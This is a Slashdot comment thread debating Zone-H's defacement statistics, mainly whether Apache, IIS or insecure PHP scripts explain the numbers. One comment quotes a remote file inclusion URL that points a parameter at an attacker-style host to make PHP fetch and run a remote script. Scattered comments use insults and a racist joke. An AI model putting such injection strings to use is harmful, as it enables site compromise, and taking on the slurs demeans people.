Breakdowns of Website Defacement by Platform

SkiifGeek writes "Zone-H have recently posted the statistical breakdown of the collected website defacements from the last few years. Surprisingly, in 2007 more Linux servers suffered a successful attack than all versions of Windows, combined. Similarly, more Apache installations were successfully attacked than all IIS versions combined. A day after posting this data, Zone-H have questioned the appropriateness of continuing to operate the archive. Despite the valuable information that can be gleaned from the service, it may soon be lost to the world. The natural successor to the now-defunct Alldas archive of defaced websites, Zone-H's archive maintains records of over 2.6 million defaced sites but may be shut down due to the continuous accusations of impropriety leveled against them any time they disclose and mirror a reported defacement."

Websight??

[Rovastar]

Even for slashdot that is terrible........

Re:Websight??

[tomhudson]

Its because the editors looked at the archive, and got defaced. They're only now discovering that it's a great way to distribute malware - they even ARCHIVE it for you!

Re:Websight??

[skimitar]

Yes. The day slashdot spells 'website' incorrectly is the day the terrorists have one ^H^H^H won.

Re:Websight??

I couldn't believe it but can't resist posting about it either, bahahahaha.

Re:Websight??

What is "o won"?

Re:Websight??

Sometimes you surf the web.

Sometimes the web surfs back.

Re:Websight??

[MrNaz]

I think it was an oversite on their part.

Re:Websight??

[Cctoide]

The first verse of the World Opponent Network prayer.

Re:Websight??

[The+Truthiness+Hurts]

Has slashdot been defaced?

Re:Websight??

[ArAgost]

In soviet Russia, web surfs you!

Re:Websight??

[chris_mahan]

Browse at -1. You'll see.

Re:Websight??

[Macthorpe]

The vomit-inducing purple colour they chose for the Apache section leads me to pray that it has in fact been defaced... and that some kind, generous soul will come along and change it to something that doesn't make me want to forcibly rip my eyes out of my skull.

Re:Websight??

[that+this+is+not+und]

I was just wondering how many screens full of spelling-nazi there would be before the Linux people would acknowledge in the first comment what was being reported. For anybody looking at this comment, it's a ways down there. heh

Re:Websight??

I was going to respond to this, but I cannot decide which hat to wear - spelling nazi or grammar nazi. I'm too confused and unsure of your meaning to decide which.

- Your friendly neighborhood Spelling and Grammar Nazi

Re:Websight??

[Codifex+Maximus]

Your insite :P is amazing!

By the way, is this another indication that "Linux has arrived"?

Re:Websight??

[Narcocide]

yes

Re:Websight??

[fotoguzzi]

(Score:5, Insiteful)

Re:Websight??

No kidding. This is a great compilation of data but entirely useless for drawing conclusions (and therefore rather boring) because everything is in absolute numbers rather than presented in relation to something meaningful. Were there more defacements in 2006 than in the other years because there were more sites on the web that year? More new site on the web?

What about the trends over time? Did the number of attacks increase due to the number of hosts on the web? Did the proportion of hosts using the vaious operating systems change? I mean come on, you don't need to provide analysis but you do need to provide full data. If you go to this much trouble to produce a report like this, why screw up the basics?

Re:Websight??

[dipskinny]

You mean it was an *oversight*

Re:Websight??

[MrNaz]

You're a fucking retard.

Hopefully not missing something...

[gigne]

Websight? I hope that is in TFA, which due to tradition I did not read.

Re:Hopefully not missing something...

[tomhudson]

Websight? I hope that is in TFA, which due to tradition I did not read.

You'd actually be doing the world a favor by defacing websight.com - it's another one of those "linkfest pages".

"Surprisingly"?

[Quietus]

Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange. After all, most websites are vandalised through oversights in custom scripting etc., rather than security holes in Apache.

Re:"Surprisingly"?

[Rovastar]

It is difficult to get accurate stats on this. Most will be stealing passwords, XSS, SQL injections, etc. So it does seem unfair and/or pointless to list via web server software or OS platform when that has little to do with it actually software you run it on. This is dodgy admin and slack devs are to blame not the technologies. For reference there have been no exploits at all in IIS 6.0, which comes with Windows 2003, whereas they have been a few with Apache.

Re:"Surprisingly"?

[call-me-kenneth]

Two factors. One, there are dozens and dozens of utterly lame hosting control panels, content management systems, messageboards and suchlike written in PHP. Secondly, IIS is far, far more secure than it was back in the bad old days. (And I speak as a fervent Apache supporter.)

Re:"Surprisingly"?

[El+Lobo]

Hmm.. I though here in Slashdot many people deny that there are more succesful attacks in Windows just because it is the more popular platform. So now, in this case it **is** true that there are more succesful attacks on Apache just because it is the more populat server. Well, come on people...

Re:"Surprisingly"?

[ozmanjusri]

So now, in this case it **is** true that there are more succesful attacks on Apache just because it is the more populat server. Well, come on people...

It still makes sense because the bulk of successful attacks on webservers result from attack methods that are not platform specific (Attack against the administrator/user (password stealing/sniffing), Shares misconfiguration, File Inclusion, SQL Injection etc).

The bulk of successful attacks against Windows, at least until very recently, have resulted from OS flaws.

Re:"Surprisingly"?

[cbart387]

Hmm.. I though here in Slashdot many people deny that there are more succesful attacks in Windows just because it is the more popular platform. Not everyone. I'm not a fan of windows, only because I find Linux more responsive and easier to use for my programming. I agree with you however that there is a double standard here. People who bash Windows (where it's not warranted) get modded insightful, However when they try to defend Windows it's flamebait or troll. I'd go on a rant but I just wanted to say not everyone screams Windows security sucks yadda yadda yadda

Re:"Surprisingly"?

if you reread that you'll see what he's really saying. It'd be the same as saying something like...

Of course there are more black colored car accidents then purple colored car accidents. It's because there are more black cars, but this doesn't say anything about why the car accidents happen.

Re:"Surprisingly"?

[multisync]

I know. It's almost like there is more than one person posting on the bbs.

Re:"Surprisingly"?

[jsiren]

Harrumph.

A platform that is reasonably popular or otherwise interesting, and unsecure by design will be attacked. A more secure platform, which is also reasonably popular or otherwise interesting, will get attacked less.

Now, looking at the attack method table, it's obvious that in a case of defacement, the underlying web server platform is largely irrelevant. Web sites these days are complex arrays of application logic and databases. Rarely does a large web site consist of a web server dealing out static files. This change enables more dynamic content and easier content administration than before; then again, it adds several places where things can go wrong. What the Zone-H statistic really tells is that in a complex setup where there are components that can be compromised, the front end web server is usually running Apache. This tells nothing about its security, since it's usually not the front end web server software that is compromised.

Now, if the site included common web applications and application platforms in its reporting, the statistics would have much more value.

Re:"Surprisingly"?

[0kComputer]

The author attributes this number to the fact that more people are switching from IIS to Apache. Check out the latest netcraft survey, that doesn't seem to be the case. Over the last few years, IIS seems to be hanging on at around 35-40% market share and apache around 50-60%.

Re:"Surprisingly"?

[camperdave]

I though here in Slashdot many people deny that there are more succesful attacks in Windows just because it is the more popular platform.

Of course windows gets attacked more because it is more popular. Nobody is denying that. However, it's not *JUST* because it is popular. It's the ratio of successful attacks to attempted attacks that people have a problem with. Windows has historically had a high ratio, meaning it was easy to crack into. Security holes used to remain open for months, or even years, because nobody but Microsoft has the means to fix them.

People also have a problem with the level of internal security once you crack into a windows box. Most of the time you immediately have full control of the machine. This is not the case with a UNIX based machine, where you typically only have access according to the server daemon which was cracked. Crack the FTP server and you only have access to what the FTP server has access to. Crack the web server and you are restricted to what the web server had access to.

Re:"Surprisingly"?

[snl2587]

Secondly, IIS is far, far more secure than it was back in the bad old days.

I agree with you wholeheartedly on this one, and I too am an Apache supporter. On the flip side, though, the newer versions of IIS as much more restrictive and don't let you do nearly as much as Apache, so of course IIS would have less defacing just for that.

Re:"Surprisingly"?

[Jugalator]

Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange. After all, most websites are vandalised through oversights in custom scripting etc., rather than security holes in Apache. I agree; how many of those were caused by a brain dead password in a web admin console or elsewhere?

I mean, it's not really OS/software vulnerabilities behind most of these.

That would have been surprising, and a true eye opener with web servers having years of development time and bug fixing behind them.

Re:"Surprisingly"?

[Midnight+Thunder]

Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange. After all, most websites are vandalised through oversights in custom scripting etc., rather than security holes in Apache.

By itself the figure is worthless. On the other hand stats indicating how the sites were compromised would be much more valuable.

Re:"Surprisingly"?

The bulk of successful attacks against Windows, at least until very recently, have resulted from OS flaws.

If autorun is left enabled, that is user configuration error. If Office files or attachments run VB by default, that is user configuration error. If prompt-less install for all sites is enabled in IE, that is user configuration error. If Super Spyware Screensaver is installed by non-EULA-reading user, that is user configuration error. I *HATE* windows and the mono-culture that lets Redmond, WA f-up shit with patches and updates. However, most security issues are addressable via proper configuration.

Re:"Surprisingly"?

[CastrTroy]

That's what I was thinking. Apache is a much more powerful tool than IIS. It's like comparing radial arm saws to a mitre box. One will give much more injuries if you don't know what you're doing, but provides much more power.

Re:"Surprisingly"?

"Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange" - by Quietus (808995) on Saturday March 15, @09:58AM (#22759232) Well, well - then, given YOUR supposition? Then, it's NO SURPRISE that Windows machines are more attacked by viruses/spyware/trojans (malware in general) than are *NIX machines... right??

*NIX only has a "security-by-obscurity" advantage @ best, online, since it is far, FAR less utilized vs. Windows NT-based OS' out there today... which pretty much tosses the CONSTANT "Anti-Windows" rants here by /.'ers right into the "circular file"...

Re:"Surprisingly"?

Did you not notice, Linux was quoted once. Which I presume includes SUSE, RHEL, FC, Debian, Slackware, Ubuntu and a host of others all running Apache.

To slant the figures they then quote Windows 2003, Windows 2000, Windows NT/9x, Windows XP, Windows NET as seperate OSes. Add them up... I get 139503. Seems impressive still.

Getting to the web server, notice what is missing. MSSql.

In the fine print, these are attacks. t is not clear how many were sucessful, but they do have some numbers at the bottom.

Besides, no one wants to deface windows, they want to 0wn them for spam bots. I could publish numbers off my rather typical cable modem firewall and 98% of the hits chase down to a pawned MS-Windows box.

Slightly slanted.

Posting anon as the MS crows are out mod'ing people down for saying things like - Vista - Virtually Intense Source of Time-wasting Aggravation.

Re:"Surprisingly"?

[edunbar93]

Uh, website defacement would require one of two things: Either really poor filesystem security (leaving the directory for your virtual site writable by whatever user Apache runs as), or a weak FTP password. Of course, that password could just as likely be scooped by someone listening on a nearby router or some other program that broke in through a broken php program. But for the most part, I've noticed that hackers these days are more interested in making money by spamming or phishing than they are in website defacement.

Re:"Surprisingly"?

[element-o.p.]

I kinda suspect that Apache is losing market share (is that even an appropriate term for a free product? anyway...) because some other open-source products are starting to mature. For example, while I still run Apache on my personal projects, I've switched to using Lighttpd at work because I got fed up with continuous config file syntax changes on every new release of Apache 2, and I tend to update the work servers a lot more often than my home server. So, if IIS is holding steady, and some of the other open-source projects are maturing and taking some of Apache's share, then what do you expect will happen to the ratio of IIS vs. Apache servers on-line?

Re:"Surprisingly"?

[sco08y]

The bulk of successful attacks against Windows, at least until very recently, have resulted from OS flaws.

And now the bulk of attacks against Apache are due to admin misconfigurations. So while MS fixed the underlying problems, the Apache crew needs to improve the user interface for administration.

There is commercial software that provides a GUI for Apache (hit your favorite search engine) and it ought to be a priority to bring such functionality into the core.

Re:"Surprisingly"?

[geekboy642]

The only valid statistics in this case will be "defacements per 1,000 servers active". Apache-using programmers are (apart from the brainwashing) no different from IIS-using programmers. They all make mistakes. Some of them just make those mistakes on a clearly superior platform.

(The defensive linux fanboi will mod me troll for calling windows superior. The defensive windows fanboi will mod me troll for calling linux superior. The rational people will mod this redundant, 'cause I'm sure it's been said a thousand times before.)

Re:"Surprisingly"?

[Antique+Geekmeister]

There is also the absolute lack of any security model in dozens if not hundreds of ser-built add-on moudles. Some of them are robust and well-tested (Webmin comes to mind). Others are hacked up pieces of debris written by new users who just learned to spell PHP.

Re:"Surprisingly"?

[SL+Baur]

Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange. Please take into account the fact that Storm botnet attack specifically avoided attacking Microsoft Windows 2003 Server. That was posted here, some time ago.

How many of the Apache attacks came from Storm? Inquiring minds want to know!

*All* of the numbers are quite small compared to what I would have expected given the reported number of members of the Storm botnet.

Re:"Surprisingly"?

[SL+Baur]

For reference there have been no exploits at all in IIS 6.0, which comes with Windows 2003 Well, duh. As you and the other Microsoft Fanboys here like to point out to us when it comes to desktop attacks, you're not being targeted and we are. The Storm botnet was aimed at Linux/Apache servers and specifically avoided Microsoft Windows 2003 Server.

And another quote from Microsoft Fanboys that I'll throw back at you, "you just don't have enough market share to care about."

Not to defend sloppy admin practices, but I despise hypocracy.

Re:"Surprisingly"?

[SL+Baur]

What's the frequency, Kenneth?

You missed the point too. The supposedly ultra-powerful, ultra-huge, botnet that has consumed a vast portion of the internet, Storm, is specifically coded to not attack Microsoft Windows 2003 servers and only attacks Linux/Apache servers.

And you were moderated +5 informative? Bah! I want my fair share of the crack everyone seems to be smoking.

Re:"Surprisingly"?

[SL+Baur]

By itself the figure is worthless. On the other hand stats indicating how the sites were compromised would be much more valuable. Whew. I was beginning to think no one posting here had a clue. Sad though, that you haven't been moderated up yet.

The most "popular" attack method recently has been the Storm botnet. It specifically *does not* target Microsoft Windows 2003 Server. It's very easy to get low numbers when you are not a popular target.

Re:"Surprisingly"?

[Goaway]

And? What does "coded not to attack Microsoft Windows" mean to you, exactly?

Re:"Surprisingly"?

[SL+Baur]

Eh? -ENOSENSE.

It was coded not to infect Microsoft Windows 2003 Server. It attacks Microsoft Windows desktop machines. The article is about server attacks.

Re:"Surprisingly"?

[Goaway]

Yes, and? What is the relevance of this statement?

Re:"Surprisingly"?

[wish+bot]

The most powerful botnet/networked computer on the planet has been attacking Apache installations for a good long while but ignoring ISS, which may be the reason behind the results. It is an interesting question.

Re:"Surprisingly"?

[wish+bot]

Yes, I realise I've just said that Storm has been ignoring the International Space Station. Good thing too!

Re:"Surprisingly"?

[plague3106]

On the flip side, though, the newer versions of IIS as much more restrictive and don't let you do nearly as much as Apache

Please, do tell.

Re:"Surprisingly"?

[Goaway]

Well, if Storm is not attacking IIS (and now you made me have to pause and consider which letters go where, too), isn't that likely just because IIS is harder to attack, thus not really biasing the results in any meaningful way?

Re:"Surprisingly"?

Actually, it's just one insomniac claims adjuster. Have you seen Tyler Durden?

Re:"Surprisingly"?

[Obsi]

You stated a version number for IIS, but not for Apache. What version of Apache are you referring to?

Re:"Surprisingly"?

[SL+Baur]

You would have to ask the author of the Storm code that question.

It undoubtedly skews the results and that was my point.

And no. The relative security *cannot* be inferred from the numbers they post. No doubt some, but not all of the infrequency of successful attacks against MacOS X and Linux desktop hosts contribute to their lower numbers, but since the Mac and some Linux distros do things just as evilly as Microsoft does it, their numbers would undoubtedly increase if the attacks against them increased.

The Microsoft Fanboys say that the number of successfully attacked Microsoft Windows XP desktops is due to the relative installation base (and they are correct). The same situation applies here, in the other direction.

Re:"Surprisingly"?

The most powerful botnet/networked computer on the planet has been attacking Apache installations for a good long while but ignoring ISS, which may be the reason behind the results. It is an interesting question

Well I can understand why SkyNet would send terminators to attack helicopter installations. I guess there's no worry about the International Space Station as long as they can kill John Connor.

Re:"Surprisingly"?

[Zaharazod]

Yeah, this isn't surprising at all. Apache still serves a much larger volume of the web than IIS, and quite a bit of that is aging, security-hole-ridden PHP software. This has nothing to do with the security of Apache, or IIS for that matter.

It may, however, have something to do with PHP.. or at least the quality of deployed PHP applications..

Re:"Surprisingly"?

[multisync]

I thought Tyler was just the product of the imagination of an autistic boy from Boston.

Re:"Surprisingly"?

[Billly+Gates]

I have also known some linux admins who think there software is so secure that they do not need to patch their systems. After all using windowsupdate and rebooting is what inferior MCSE's do with their systems. Right?

I guess it shows that Microsoft has been taking security seriously and good and bad admins exist in both platforms.

Maybe this can lead to a more secure apache. But your right with SQL injections. Most IIS sites also use SQL Server which has been alot more secure by default recently.

Re:"Surprisingly"?

[jc42]

The Microsoft Fanboys say that the number of successfully attacked Microsoft Windows XP desktops is due to the relative installation base (and they are correct).

No, the installation base explains only the number of attacks. The number of successful attacks is explained by the relative security of the various systems. And you really should distinguish successful attacks on the basic software from the successful attacks that exploit misconfigured sites or add-on software. Otherwise you're lumping together successful attacks on software that comes from different sources.

If you don't make such distintions, I can "demonstrate" the poor security of your favorite web server (or OS) by simply installing a CGI script that accepts any string and evals it.

Re:"Surprisingly"?

[gr8scot]

Not to defend sloppy admin practices, but I despise hypocracy. What do you have against government of the hypopotami, by the hypopotami, for the hypopotami? One hypopotamus, one voat, I say!

Re:"Surprisingly"?

[SL+Baur]

The number of successful attacks is explained by the relative security of the various systems. The number of successful attacks is largely determined by the installed base of the attacked application.

W3 (and Gnus 5 with a Mime add-on, for that matter) on XEmacs 19.14 was easily compromised by a malformed jpeg. There existed numerous stack overflow possibilities in the core XEmacs jpeg code that were fixed in later months, but not released until almost a year later[1]. Did that matter?

As far as I know, and I read over all the bug reports during that time period, there were 0 reported cases of systems being pwned due to XEmacs 19.14 jpeg display bugs. Does that make it secure? Nope.

[1] I accept full blame for that as it became my responsibility after XEmacs 19.14 to release updated versions in timely fashion.

Re:"Surprisingly"?

[KevReedUK]

OK... So what you essentially want is to have the authors tell you, not only which attack vectors are responsible for the various defacements, but also which discrete piece of software is responsible for it?

You specifically cite the Storm Botnet, a distributed malware system comprising so many rapidly-changing elements that to specifically identify it would likely be a difficult task at the very least, a waste of valuable (and finite) resources, and potentially impossible to achieve reliably.

I propose an alternative... Attack your requirement for information from the opposite angle...

There have been numerous analyses of Storm and how it works. I'm fairly certain that at least one of these will include a list of the attack vectors it's known to use. This may not enable you to get exact numbers on which defacements are Storm-related, but at least it will give you the numbers (and hence proportion) of attacks that aren't Storm-related.

The above having been said, I would hazard a guess that any mention of Storm is pretty irrelevant as, judging by the Attack Reaason table, there is no "Economic Gain" category, the only viable category to use in classifying Storm. Let's face it, Storm isn't about Revenge, Patriotism, Politics, Technical Challenge, Fun, or even "One-Upmanship"... It's about building, controlling and utilising the largest possible distributed malware installation system with the aim of selling the use of blocks of it to the highest bidder for money. As you can no doubt see, the only relevant category for this, out of those available, would be "Not Available".

This leads me to believe that the figures are for defacements in the traditional definition, namely modifying the "look and feel" of the site in question, not in modifying what's going on under the hood in terms of spreading malware. If my hunch is correct, then the excuse that Storm was written to deliberately ignore IIS (and I can't exactly recall if it was ALL versions of IIS, or just 6.0) is, whilst a piece of anecdotal evidence to support the theory that those who would do harm to the online infrastructure would be more prolific in their attacks on non-Windows/IIS machines, entirely irrelevant to the current discussion.

Also, looking at the "Reasons" table, the only reasons that could be related to the installed OS or Web-Server are "As a Challenge" (where the attacker is deliberately targeting an attack vector in a specific combination of the above (and/or any applications running on top) for the purpose of proving their "technical flair and ability"), or "Revenge against the website" (but only where that revenge is targeted at their choice of software combination, rather than content). All in all, I think that the statistics are useful, as they do merely list successful defacements, and are biased only by the distribution of the install base, rather than any bias in the attacks themselves.

Of course, I could be wrong, and the authors may have just lumped all the automated, Storm-type attacks under one of the other, entirely irrelevant, "Attack Reasons". Would have been useful if they had given a clear statement somewhere on the site as to what the definition of a "defacement" is, and whether it would include Storm (and its derivatives / competitors).

And before anybody decides it would be worth modding me down or flaming me with accusations of being a Microsoft Fanboi, please be advised that, while I DO use Microsoft products, I am very much pro FOSS. As a matter of fact, as soon as I can find the time to do the research to find a version of Linux (or *BSD) that will recognise my wireless USB Device (let alone allow me to configure it), I will be migrating my home PC to a dual-boot Linux (or *BSD)/XP box (with the XP retained for legacy apps, home-working, media-centre applications and, mainly, because dumping that much money on a piece of software and not continuing to use it in spite of it's flaws just feels so damn wrong!).

Re:"Surprisingly"?

[KevReedUK]

Correct me if I'm wrong (and I have little doubt that some bright soul probably will, in light of what time I'm writing this!), but...

Whilst it may appear on the surface that IIS is becoming more restrictive in it's options, this is largely because they are now giving admins the option of configuring their webservers via text file a-la Apache (albeit via a somewhat more easily-legible and logically structured XML file) and, in light of the fact that many of the seriously advanced options that it provides are only likely to be used by the kind of folks who would prefer a text-based config interface, they have removed these options from the GUI.

My hunch is that this is for 3 main reasons:
1) To de-clutter the existing GUI (which, lets face it, had started to look more than a little cramped... How many tabs on that damn "properties" window if you have all the available modules installed?).
2) To ensure none of these advanced options are not switched on by accident.
3) Significantly easier standardisation of deployment configurations (author your XML file once, then just copy it onto all the boxes and restart the IIS services... Job done WITHOUT having to spend hours mucking about with checkboxes)

So sure, it may be "just for that" that there is less defacement of later versions of IIS, but if so, my hunch is that this is only because the average admin will be affected by a reduction in the feature-set (that exists purely on the surface), whereas the more experienced IIS admins know these options exist (and hence are less likely to f#@k 'em up!). It's not often I'm led to feeling that Microsoft deserves a pat on the back for learning from (although, I have little doubt that various Apache admins out there will call it "stealing"!)an idea found within one of their competitors and, not only accepting that it has it's advantages over their prior implementations, but also for developing that concept such that it's more logically laid-out and, thereby, easier to use and screw up!

That having been said, I'm a total amateur with regard to webserver admin, and the existence of the XML file I refer to above is gleaned from... well, I read it somewhere, but can't remember exactly where! The word "Metabase" springs to mind, but I can't recall if this is what MSFT call this XML file, or if that was the name of the source of what I was reading...

Re:"Surprisingly"?

[BuckaBooBob]

Well they seemed to miss the Important data like Months/Years since any security patches were applied. I would guess that the search for my Surprise face would be a extremely short one to see that 80%+ of the compromised sites haven't seen any type of a security patch in 6+ Months. Its a pretty big difference between how long it takes Linux/Apache to Patch a security exploit to Microsoft twiddling its thumbs for 3-6 month before they even recognize a exploit and patch it and in some cases they just don't patch it at all(Unpatches IE 6 bugs?! I know it doesn't relate to IIS bugs.. but still.. It drives me they just don't care about products that have the market share).

FYI The article does

[sleeponthemic]

Actually mention proportions. Clever little summary, it was as if one million slashdot readers suddenly cried out in indignation... "I have to read the article? Nooo"

The shitty spelling on this story

is why affirmative action is a bad idea. Hey, why is Stevie Wonder always smiling? He doesn't know he's black!

hmmm

[ionix5891]

This is exactly why i don't install any 3rd party php scripts (only custom made) and run lighttpd/nginx (beside being faster than apache with php-fcgi)

Re:hmmm

[BrentH]

Is exactly why I don't install any 3rd party software. Only my custom BIOS, OS and browser, which I whipe every night and reprogram every morning, just to be absolutely sure nothing has been slipped in by said 3rd parties.

Re:hmmm

[SelrahCharleS]

My friend does that actually. Not for paranoia reasons though, his hard drive quit and he has been running off a Knoppix CD for a while now.

Re:hmmm

[TheRaven64]

Ah, but who built your hardware? How do you know your RAM chips aren't trojaned and your CPU doesn't contain a small transmitter? Personally, I do everything in my head and never talk to anyone. It's the only way to be sure.

Weighted for market share?

[JshWright]

Perhaps I missed it in TFA, but I saw no weighting for market share...

To pick an arbitrary statistic, in June 2007 Google reported Apache with a 66% market share and IIS with a 23% share (source). Given that the TFA lists "Attack against the administrator/user" as the most common attack method by a wide margin, and it seems to me that both Apache and IIS would be equally vulnerable to dumb administrators, wouldn't it make sense that the server with the larger market share would see more attacks?

Re:Weighted for market share?

> Given that the TFA lists "Attack against the administrator/user" as
> the most common attack method by a wide margin
> it seems to me that both Apache and IIS would be equally vulnerable
> to dumb administrators, wouldn't it make sense that the server with
> the larger market share would see more attacks?

I agree. That was rather surprising to me as well. I was assuming the
attacks were being performed on older, unpatched versions Apache with
known exploits. Once I saw the statistics with the #1 method of getting
control was guessing the admins' password I was disappointed and relieved.

Disappointed at how many people are putting apache webservers up with
default or easy to guess root administrator passwords. Relieved that
the attacks don't make use of exploits of the software itself.

Now, what I would *really* like to see is a breakdown of which method
of getting access vs. which kind of web server to see if the statistics
are true for every brand of web server, or it's just apache that's so hard
to "exploit".

Re:Weighted for market share?

[hey!]

Personally, I was alarmed by the rapid spike in website defacements on Windows 2003 during the period, which started at 72 thousand in 2005 and soared to 114 thousand in 2007. I'm sticking with Windows 2000, which started at 101 thousand in 2005 and dropped to under 24 thousand in 2007.

If this trends continues, there will be negative fourteen thousand defacements of Windows 2000 this year -- that is to say fourteen thousand anti-defacements. Fourteen thousand webmasters hosting on Windows 2000 will find their sites say what they meant to say, despite their having actually said the wrong thing.

It's like having an operating system that, instead of asking "where do you want to go today?" simply tells you where you ought to go.... Oh,wait.

Re:Weighted for market share?

[itsdapead]

To pick an arbitrary statistic, in June 2007 Google reported Apache with a 66% market share and IIS with a 23% share (source).

And that's 66% overall. Now think what proportion of the sites containing homebrew or 'small scale'* open source blogs, wikis, content management systems, being managed by amateur/unpaid/hobbyist webmasters are likely to be running on the free Lunux/Apache platform rather than paying money for IIS?

both Apache and IIS would be equally vulnerable to dumb administrators

...and the same goes for SQL injection, file inclusion etc. which represent vulnerabilities in specific scripts and CGI applications rather than the underlying web server or operating system. (* i.e. as opposed to big league FOSS project backed by IBM, Sun, Red Hat et. al. with paid maintainers).

Re:Weighted for market share?

[metlin]

Been reading Douglas Adams much? :)

Re:Weighted for market share?

[call-me-kenneth]

I hate to be the bearer of bad news, but the canonical webserver survey shows Apache declining significantly and steadily against IIS for the last two and half years - it's currently running at 50%, vs IIS with 35%.

Re:Weighted for market share?

[lseltzer]

The Google blog you cite essentially admits it's not as accurate as the Netcraft survey, which shows the market shares much closer, i.e. about 51 to 36.

But neither of them is really measuring market share; they're measuring share by domain, not server. So if you assume that one OS has more domains on it, on average, than the other, then its "market share" is proportionally less than the numbers in the survey. Personally, based on what I know about the hosting market, I would assume that Apache servers have more domains on average than most Windows servers, but that's a guess.

Re:Weighted for market share?

[KermitJunior]

Not to be flame bait, but isn't this the EXACT opposite of our Linux/Windows virus discussion? I am a "GNU/Linux" User, but I find the statement you make... humorous.

Re:Weighted for market share?

[JshWright]

I wouldn't say it's the opposite. I would also make the case that Windows' popularity has had negative consequences on its security history.

I think it's fair to say that GNU/Linux does have some better security philosophies, but if you put it (pick a distro...any distro...) on every Windows user's computer right now, you'd likely see a dramatic increase in the incidence of viri/worms targeting GNU/Linux being successful in the wild. So long as users are going to pick dumb root passwords, and give them away to the first "official" looking dialog box that asks, the problem will never go away.

OpenBSD on the other hand.... ;)

Demographic breakdown

[G3ckoG33k]

I wouldn't be surprised if most Linux servers were defaced because of poor configurations, by home users. How many have the needed skill to do it well and really secure? How many home users wish to pay for IIS? Probably not many.

I guess IIS users on average are better at maintaining a server, as they probably are employed to do so.

It would be interesting to see a "demographic" breakdown on defaced servers, how many corporate Linux servers have been defaced. I believe the numbers will be different.

Re:Demographic breakdown

[EsJay]

How many home users run a web server? Out of those , how many have enough traffic to invite vandalism? I would think home servers are statistically insignificant. And speaking of statistics, WTF are these "registered attacks" they measure? Is there a certifying body where you register your attacks?

Re:Demographic breakdown

[Kadin2048]

I suspect that the number of websites running on home servers which also had a high enough profile to make it into the database when they were defaced, is quite small.

Although I think administrators are to blame, I don't think it's a "home user" versus "professional" problem. (And seriously, do you really think there aren't tons of script kiddies running pirated copies of IIS? Just because you want to use it doesn't mean you have to pay for it.) I think a lot of the blame probably lies with crummy web-based administration tools. Without regular updates, those things can be an easy remote root, which is why a lot of experienced admins won't touch them and instead use SSH (which with pubkey auth is pretty secure). However, a lot of low-cost vhosting facilities push webmin tools to users who don't know any better, and the combination of poor tools plus inexperience is deadly.

Re:Demographic breakdown

[EsJay]

You don't pay extra for IIS or pirate it. It's included with Windows XP Professional and Vista (I don't know exactly which editions) as well as Windows Server.

Re:Demographic breakdown

[westlake]

I wouldn't be surprised if most Linux servers were defaced because of poor configurations, by home users.

Home users running web servers?

How many home users are paying for the static IP and business grade account that makes a server practical and not a violation of their TOS?

Re:Demographic breakdown

I'm sure the number of people who actively go and set up IIS (which is by default, not set up to run) and run it on XP and Vista at home are relatively small...

The number of people running WIndows 2003 Server at home is, also, probably relatively small.

Re:Demographic breakdown

[imAck]

Agreed that it would make sense to see the demographics. I would think that any small, home user's hobby website, the kind of which would be the most likely to be poorly configured, aren't going to be targets of website defacement.

Of course, it's a vacuous argument, I have no data to support it.

Re:Demographic breakdown

[RiotingPacifist]

first you say

You don't pay extra for IIS or pirate it. but then go on to say

It's included with Windows XP Professional and Vista Most home users on xp pro will be using pirated copies. hell i have a legit CDkey but no CD so when i went looking for an uncracked windows xp home, all i found was "XP pro OEM + 1337 wga hacks"

Re:Demographic breakdown

[Krondor]

I wouldn't be surprised if most Linux servers were defaced because of poor configurations, by home users. How many have the needed skill to do it well and really secure? How many home users wish to pay for IIS? Probably not many.

Exactly, how many virtual host web server businesses offer IIS for their $5/month subscribers. I haven't seen any, it's all Apache and I can guarantee most of those people are amateurs. The web guided installs of things like phpMyAdmin, Drupal, etc... and the lack of knowledge must certainly contribute significantly to the Apache stats from TFA.

Re:Demographic breakdown

[RAMMS+EIN]

``I guess IIS users on average are better at maintaining a server, as they probably are employed to do so.''

Don't fool yourself into thinking that, since they are getting paid for it, they are better at it than people who aren't getting paid. Most people I've seen "maintaining IIS" maintained IIS because it had a GUI. That is, they could fire up the config tool and check boxes until stuff seemed to work.

By contrast, most people I know who maintain Apache learn quite some about how HTTP works and how Apache works, first. I don't know if that is because they want to, or because Apache forces them to before it works at all, but the fact is that they strike me as more knowledgeable than the IIS maintainers I've seen.

None of the above says anything about security, though. Apache's configuration can get horribly complicated, opening the door to ridiculous security holes. Also, many people who run Linux then sit smiling snugly and sneer at people running Windows about how much more secure they are, just because they run Linux. That's not a way to get good security, of course. Finally, as others have pointed out, to deface a website, you don't need to exploit a vulnerability in the web server. Most defacements probably happen through shoddy code in the web site itself.

Re:Demographic breakdown

[QunaLop]

there are some, though i haven't tried any, eg: 1and1

Re:Demographic breakdown

[someone300]

How many home users give a shit about the TOS until they get a nasty letter? :)

Plus those with the inclination will discover things like freedns, noip, dyndns, etc. which, whether running a webserver or not, certainly help with the whole dynamic IP problem.

!Apache, but PHP

[Penguinisto]

Seriously... by this point, Apache can't do much more to stop someone from taking advantage of crap script and the underlying (and very likely unpatched) PHP running it.

When the cure (more often than not these days) involves not having to disturb Apache at all (save for possibly changing something in httpd.conf), but instead fixing/dumping the bad script that let the baddies in, or patching PHP to plug the hole in it, then odds are good that it ain't Apache's fault, no?

To be fair, it would also be like blaming IIS for crap XML or ASP script, and MSFT would certainly waste no time in saying so.

/P

Re:!Apache, but PHP

As of IIS 7 will be featuring FastCGI support and thus will have better support for PHP and other web applications, making it a more viable platform for website defacements...

Re:!Apache, but PHP

[Klaus_1250]

Have to agree. A substantial proportion of defacements are the results of security holes in scripting languages/scripts, with PHP leading the way. If you run a webserver, check your HTTP-security or Snort logs.

Re:!Apache, but PHP

[corsec67]

Agreed on the PHP being a huge problem.
At my work, we see a bunch of attempts to exploit PHP every week, usually like this:

http://www.example.com?var=http://www.1337h4x0r/script.php

(we don't even use PHP, so this is probably coming from other hacked servers that are running php)

The "feature" they are trying to exploit there is just crazy:
If var in that case is used as a file name in a script load call, PHP will happily download the script from that website and run it instead of the local file that was expected. There are a bunch of problems with what is going on there, since having a file name in the url is just horrible, but then for the language to then take a url and download the file automatically is even worse.

From, quite approiately enough, The Daily WTF

Re:!Apache, but PHP

[MrMunkey]

